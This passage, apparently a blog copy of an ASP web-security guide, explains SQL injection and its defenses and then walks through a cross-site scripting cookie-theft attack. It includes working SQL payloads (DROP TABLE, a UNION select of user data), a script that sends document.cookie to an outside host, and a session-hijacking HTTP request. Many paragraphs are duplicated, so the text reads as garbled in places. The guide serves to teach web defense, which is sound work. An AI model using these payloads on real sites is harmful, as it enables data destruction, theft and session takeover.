Now to the more dangerous part: SQL injection. This is a technique which allows
the attacker to execute malicious SQL statements. With the help of xp_cmdshell
it’s even possible to execute system commands if the database is accessed as ’sa’.
This bug exists whenever you use unvalidated data that has been submitted by
the client to perform a database query. Let’s take this SQL-Statement, where the
string “TERM” can be submitted by the visitor.
the attacker to execute malicious SQL statements. With the help of xp_cmdshell
it’s even possible to execute system commands if the database is accessed as ’sa’.
This bug exists whenever you use unvalidated data that has been submitted by
the client to perform a database query. Let’s take this SQL-Statement, where the
string “TERM” can be submitted by the visitor.
SELECT NewsId, NewsTitle
FROM T_News
WHERE NewsTitle LIKE ’%TERM%’
FROM T_News
WHERE NewsTitle LIKE ’%TERM%’
The client could craft the term to drop the table T News:
SELECT NewsId, NewsTitle
FROM T_News
WHERE NewsTitle LIKE ’%’;
DROP TABLE T_News --’
FROM T_News
WHERE NewsTitle LIKE ’%’;
DROP TABLE T_News --’
Yes, this is possible. Just submit ’; DROP TABLE T_News -- as the search term.
First the WHERE clause is closed with the single quote, and then we can start the
next statement with the semicolon. The two dashes at the end start a comment,
so the single quote which the developer has inserted after the user’s input doesn’t
produce a syntax error.
It’s also possible to select any other data and display it instead of the News which
the developer wanted to display on this page. You can use the UNION statement for
that. The only requirement is that both queries return the same number of columns
and the same data type in each column. If necessary use CONVERT to achieve that.
[1] shows a trick how you can find out how many rows are included in the query
using the HAVING clause. One example for a UNION crack:
First the WHERE clause is closed with the single quote, and then we can start the
next statement with the semicolon. The two dashes at the end start a comment,
so the single quote which the developer has inserted after the user’s input doesn’t
produce a syntax error.
It’s also possible to select any other data and display it instead of the News which
the developer wanted to display on this page. You can use the UNION statement for
that. The only requirement is that both queries return the same number of columns
and the same data type in each column. If necessary use CONVERT to achieve that.
[1] shows a trick how you can find out how many rows are included in the query
using the HAVING clause. One example for a UNION crack:
SELECT NewsId, NewsTitle
FROM T_News
WHERE NewsTitle LIKE ’%DOESNOTEXIST’
UNION SELECT UserId, UserName
FROM T_User --%’
2.1 Protection: Approach I
Filter characters
Luckily this attack is much easier to protect against than cross-site scripting. Make
sure to remove or escape all single quotes in string parameters. Additionally enforce
that any numeric input is really numeric using the IsNumeric function call. The
ASP functions (see section 4.2) include some generic functions to prevent you from
SQL injection attacks if you use them every time. The numeric and date functions
check if the input data is valid and then explicitly convert them with CInt, CLng,
CDate, etc.
Luckily this attack is much easier to protect against than cross-site scripting. Make
sure to remove or escape all single quotes in string parameters. Additionally enforce
that any numeric input is really numeric using the IsNumeric function call. The
ASP functions (see section 4.2) include some generic functions to prevent you from
SQL injection attacks if you use them every time. The numeric and date functions
check if the input data is valid and then explicitly convert them with CInt, CLng,
CDate, etc.
ADODB Command
There is another approach which is very safe but more work to implement[12].
You can use ADODB prepared statements to automatically sanitize the data. See
appendix D for an example.
Please note, that in the example I have checked the numeric parameters. This
isn’t strictly required, but if you let it out you get some nasty error messages:
“Application uses a value of the wrong type for the current operation.”.
There is another approach which is very safe but more work to implement[12].
You can use ADODB prepared statements to automatically sanitize the data. See
appendix D for an example.
Please note, that in the example I have checked the numeric parameters. This
isn’t strictly required, but if you let it out you get some nasty error messages:
“Application uses a value of the wrong type for the current operation.”.
3. Attack Demonstration
This is the procedure how a cross-site scripting attack could take place. It demonstrates
how to steal a cookie.
For the session handling, IIS sets a cookie named “ASPSESSION...”. It’s quite
impossible to guess the name and the value. But it’s possible to steal this cookie.
When you get a SessionID you can pass it to the server and then you own that
session. I’ll give you a step by step guide.
how to steal a cookie.
For the session handling, IIS sets a cookie named “ASPSESSION...”. It’s quite
impossible to guess the name and the value. But it’s possible to steal this cookie.
When you get a SessionID you can pass it to the server and then you own that
session. I’ll give you a step by step guide.
3.0.1 Set up/look for a page to log cookies
You first have to get some possibility to log the stolen cookies. This may be an ASP
page on your own server that logs the query string to a file. Another possibility
would be use the query string needed to create an entry in some guestbook. Let’s
assume the URL to create a guestbook entry is
http://some.host/xtgbadd.asp?user=cookie&msg=MESSAGE
3.0.2 Create a JavaScript
Next you need to create a script to inject. This should redirect to the URL researched
above inserting the message. For example:
Next you need to create a script to inject. This should redirect to the URL researched
above inserting the message. For example:
<script>
location.href='http://some.host/xtqbadd.asp?user=cookie&msg=' + \
document.cookie
</script>
location.href='http://some.host/xtqbadd.asp?user=cookie&msg=' + \
document.cookie
</script>
3.0.3 Inject the script
Now inject the created script into the targeted page. For example you could inject
it into a session-based ASP forum or guestbook.
Now inject the created script into the targeted page. For example you could inject
it into a session-based ASP forum or guestbook.
3.0.4 Break the session
I assume you had at least one victim. Get the cookie from your log file (or wherever
it is stored) and extract the ASPSESSIONID cookie. For example:
ASPSESSIONIDGQGGGHRP=INGFOODCHEIDAHKMKNKJHAMK
Then you connect to the Web server and use this command. (End with two
newlines)
GET /$TARGETSITE HTTP/1.1
Host: $WEBSERVER
Connection: Close
Cookie: ASPSESSIONIDGQGGGHRP=INGFOODCHEIDAHKMKNKJHAMK
No comments:
Post a Comment